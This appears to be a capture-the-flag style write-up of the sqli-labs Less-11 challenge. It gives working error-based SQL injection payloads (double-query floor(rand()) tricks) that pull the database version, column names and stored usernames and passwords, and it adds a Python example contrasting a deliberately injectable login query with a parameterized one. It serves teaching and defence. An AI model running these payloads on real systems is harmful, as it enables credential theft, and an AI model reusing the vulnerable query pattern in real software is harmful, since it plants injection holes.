Target range: http://10.4.7.121:83/Less-11/
Capture the request.
Determine the injection type:
uname=admin'"&passwd=password&submit=Submit
The error message shows the double quote wrapped inside the quoted value, so this is a single-quote injection.
Make the query stop raising an error.
Determine the number of columns:
uname=admin' order by 10%23&passwd=password&submit=Submit
It has two columns.
When trying to dump information, we find that even when the preceding condition is true, the data still cannot be retrieved with a UNION query.

With a double query (error-based injection) it can be retrieved.
For example, now query the current database:
uname=admin' union select 1,count(1) from information_schema.tables group by floor(rand()*2) %23&passwd=1&submit=Submit
It errors: the value cannot be used as a primary key. Here we can use concat to splice strings and extract the information we need.
But what this query returns is random.

Query the version number:
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),version()) %23&passwd=1&submit=Submit
Query the databases; use limit here to filter, otherwise with too much data it may not raise an error.
Query the columns of the current table in the current database:
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1)) %23&passwd=1&submit=Submit
Query the username and password:
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select username from security.users limit 0,1)) %23&passwd=1&submit=Submit
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select password from security.users limit 0,1)) %23&passwd=1&submit=Submit
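To show the root cause this write-up exploits and its fix, here is an added example (not the lab's own PHP code) that rebuilds the Less-11 login query in Python against a constructed SQLite users table: the vulnerable function splices the username into single quotes and echoes the raw database error (which is how the admin'" probe above reveals the quote context), while the hardened function binds parameters and returns only a generic failure. The table contents and column names are assumptions.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the lab's users table (made-up rows).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "pw_admin"), (2, "dumb", "pw_dumb")])
    return db


def login_vulnerable(db, uname, passwd):
    """Less-11 style: input spliced into single quotes, raw DB error echoed."""
    sql = (f"SELECT username, password FROM users "
           f"WHERE username='{uname}' AND password='{passwd}'")
    try:
        return {"rows": db.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as e:
        # Returning this text to the page is what leaks the quote context to
        # the admin'" probe and carries the duplicate-key message in the
        # error-based (double query) technique above.
        return {"rows": None, "error": str(e)}


def login_safe(db, uname, passwd):
    """Hardened form: bound parameters, and DB errors never reach the client."""
    sql = "SELECT username, password FROM users WHERE username=? AND password=?"
    try:
        return {"rows": db.execute(sql, (uname, passwd)).fetchall(), "error": None}
    except sqlite3.Error:
        return {"rows": None, "error": "login failed"}  # generic, no DB detail


if __name__ == "__main__":
    db = make_db()
    probe = "admin'\""  # the single-vs-double quote probe from the write-up
    print("vulnerable:", login_vulnerable(db, probe, "password"))
    print("safe:      ", login_safe(db, probe, "password"))
```

The vulnerable version surfaces a syntax error for the probe; the safe version treats the whole string as a literal username and simply finds no matching row.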